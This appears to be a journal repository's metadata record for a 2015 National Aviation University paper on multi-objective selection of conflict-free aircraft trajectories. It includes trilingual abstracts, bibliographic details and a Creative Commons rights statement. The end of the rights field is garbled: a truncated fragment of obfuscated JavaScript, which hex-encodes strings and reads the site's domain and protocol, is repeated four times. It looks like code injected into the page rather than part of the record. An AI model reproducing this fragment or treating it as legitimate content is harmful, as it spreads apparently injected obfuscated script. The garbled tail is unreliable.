Запис Детальніше

SELECTION OF AIRCRAFT CONFLICT-FREE TRAJECTORIES USING DIFFERENT CONVOLUTIONS OF VECTOR OPTIMALITY CRITERION

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title SELECTION OF AIRCRAFT CONFLICT-FREE TRAJECTORIES USING DIFFERENT CONVOLUTIONS OF VECTOR OPTIMALITY CRITERION
Выбор бесконфликтных траекторий воздушных судов с использованием разных сверток векторного критерия оптимальности
Вибір безконфліктних траєкторій повітряних кораблів із застосуванням різних згорток векторного критерію оптимальності
 
Creator Bo, Wang
Kharchenko, Volodymyr
Vasyliev, Denys
 
Subject
aircraft; conflict resolution; convolution; multi-objective selection; vector optimality criterion
656.7.084:519.8(045)

векторный критерий оптимальности; воздушное судно; многокритериальный выбор; разрешение конфликтной ситуации; свертка
656.7.084:519.8(045)

багатокритеріальний вибір; векторний критерій оптимальності; згортка; повітряний корабель; розв’язання конфліктної ситуації
656.7.084:519.8(045)
 
Description The multi-objective decision-making problem of conflict-free flight trajectories selection is solved using linear, multiplicative and Germeier’s convolution of vector optimality criterion, which contains the flight regularity, economy and maneuvers complexity criteria. The computer simulation of multi-objective selection of conflict-free trajectories for resolution of the typical conflict was performed.
Решена многокритериальная задача принятия решения по выбору бесконфликтных траекторий полета с использованием свертки Гермейера, линейной и мультипликативной свертки векторного критерия оптимальности, состоящего из критериев регулярности, экономичности полета и сложности маневрирования. Выполнено компьютерное моделирование многокритериального выбора бесконфликтных траекторий для разрешения типовой конфликтной ситуации.
Розв’язано задачу багатокритеріального прийняття рішення по вибору безконфліктних траєкторій польоту із застосуванням гортки Гермейера, лінійної та мультиплікативної згортки векторного критерію оптимальності, який складається з критеріїв регулярності, економічності польоту та складності маневрування. Виконано комп’ютерне моделювання багатокритеріального вибору безконфліктних траєкторій для розв’язання типової конфліктної ситуації.
 
Publisher National Aviation University
 
Contributor


 
Date 2015-12-10
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/9813
 
Source Вестник Национального авиационного университета; Том 65, № 4 (2015); 7-11
Вісник Національного Авіаційного Університету; Том 65, № 4 (2015); 7-11
Proceedings of National Aviation University; Том 65, № 4 (2015); 7-11
 
Language en
 
Rights Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e